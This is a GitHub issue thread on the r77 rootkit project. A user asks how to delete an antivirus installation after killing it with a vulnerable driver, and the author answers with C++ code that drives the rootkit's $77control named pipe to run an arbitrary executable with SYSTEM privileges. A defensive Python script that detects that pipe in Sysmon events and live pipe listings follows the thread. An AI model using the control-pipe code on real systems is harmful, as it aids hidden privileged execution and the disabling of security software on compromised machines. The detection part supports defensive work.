bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License

Suggestion #49

Closed KRAFMA closed 9 months ago

KRAFMA commented 10 months ago

Hello man,

Do you think it is possible to do a simple PoC, or add to your r77 any code to force the deletion of a file/folder (for example, I can kill some AV with a vulnerable driver), but the best would be to delete the installation folder after killing it.

bytecode77 commented 10 months ago

There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC, r77 executes a file with SYSTEM privileges for you - and that executable should delete those files, etc.

There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.

Look at the example in ControlPipe.cpp

```cpp
#include <Windows.h>

// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.

#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation

int main()
{
    // Connect to the r77 service. The rootkit must be installed.
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        DWORD controlCode = CONTROL_USER_SHELLEXEC;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
        WCHAR shellExecCommandline[] = L"mytextfile.txt";

        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the path for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);

        // Write arguments for ShellExec
        WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * 2, &bytesWritten, NULL);

        // Now, a new process "notepad.exe mytextfile.txt" will spawn.
        // You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.

        // Use the Test Console to try out different control codes.

        CloseHandle(pipe);
    }

    return 0;
}
```

bytecode77 commented 9 months ago

Closed due to inactivity.
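From a defender's side, the useful detail in the exchange above is that a client talks to the installed rootkit service through the named pipe `\\.\pipe\$77control`, so the pipe name itself is an artifact worth monitoring. The following is an added detection example written for this page; it is not code from the r77 project or its author. It parses Sysmon pipe events (Event ID 17 PipeCreated, Event ID 18 PipeConnected, which are Sysmon's documented pipe event IDs) and flags any event whose pipe name is the control pipe, and it can also scan the live pipe listing on a Windows host. Treating every pipe whose leaf name begins with `$77` as suspicious is an assumption generalised from the one pipe name shown above; the Sysmon event XML and the image paths are constructed sample data.

```python
"""Flag the r77 control pipe in Sysmon pipe events or in a live pipe listing.

Added detection example; not part of the r77 project. The pipe name comes
from the issue above; the "$77" prefix rule is an assumption.
"""
import os
import re
import sys
from typing import Dict, Iterable, List

R77_CONTROL_PIPE = r"\$77control"   # pipe name quoted in the issue above
R77_PREFIX = "$77"                  # assumption: other $77-prefixed pipes are r77 too

# Sysmon Event ID 17 = PipeCreated, 18 = PipeConnected.
PIPE_EVENT_IDS = {"17", "18"}

_EVENT_ID_RE = re.compile(r"<EventID>(\d+)</EventID>")
_DATA_RE = re.compile(r'<Data Name="(\w+)">([^<]*)</Data>')


def parse_sysmon_event(xml: str) -> Dict[str, str]:
    """Pull EventID and the <Data Name=...> fields out of one Sysmon event."""
    m = _EVENT_ID_RE.search(xml)
    fields = {"EventID": m.group(1) if m else ""}
    fields.update(dict(_DATA_RE.findall(xml)))
    return fields


def is_r77_pipe_name(name: str) -> bool:
    """True if the leaf of a pipe name is $77control or starts with $77 (assumed)."""
    leaf = name.rsplit("\\", 1)[-1]
    return leaf.lower() == R77_CONTROL_PIPE.lstrip("\\").lower() \
        or leaf.lower().startswith(R77_PREFIX.lower())


def find_r77_pipe_events(events: Iterable[str]) -> List[Dict[str, str]]:
    """Return the parsed Sysmon pipe events that reference an r77-style pipe."""
    hits = []
    for xml in events:
        ev = parse_sysmon_event(xml)
        if ev["EventID"] in PIPE_EVENT_IDS and is_r77_pipe_name(ev.get("PipeName", "")):
            hits.append(ev)
    return hits


def find_r77_pipes(pipe_names: Iterable[str]) -> List[str]:
    """Filter a list of pipe paths (e.g. from list_live_pipes) down to r77 candidates."""
    return [p for p in pipe_names if is_r77_pipe_name(p)]


def list_live_pipes() -> List[str]:
    """Enumerate named pipes on a Windows host; returns [] elsewhere."""
    if not sys.platform.startswith("win"):
        return []
    return [r"\\.\pipe\\" + n for n in os.listdir(r"\\.\pipe\\")]


# Constructed sample events (not real telemetry): a benign pipe, a connection
# to the control pipe from an unknown binary, and a non-pipe event.
SAMPLE_EVENTS = [
    '<Event><System><EventID>17</EventID></System><EventData>'
    '<Data Name="Image">C:\\Windows\\System32\\svchost.exe</Data>'
    '<Data Name="PipeName">\\lsass</Data></EventData></Event>',
    '<Event><System><EventID>18</EventID></System><EventData>'
    '<Data Name="Image">C:\\Users\\Public\\client.exe</Data>'
    '<Data Name="PipeName">\\$77control</Data></EventData></Event>',
    '<Event><System><EventID>1</EventID></System><EventData>'
    '<Data Name="Image">C:\\Windows\\notepad.exe</Data></EventData></Event>',
]


if __name__ == "__main__":
    for ev in find_r77_pipe_events(SAMPLE_EVENTS):
        print(f"ALERT EventID={ev['EventID']} pipe={ev['PipeName']} image={ev.get('Image')}")
    for p in find_r77_pipes(list_live_pipes()):
        print(f"ALERT live pipe present: {p}")
```

Event ID 18 is the more telling of the two: it records which image connected to the pipe, so the alert names the client process rather than only the service that created the pipe.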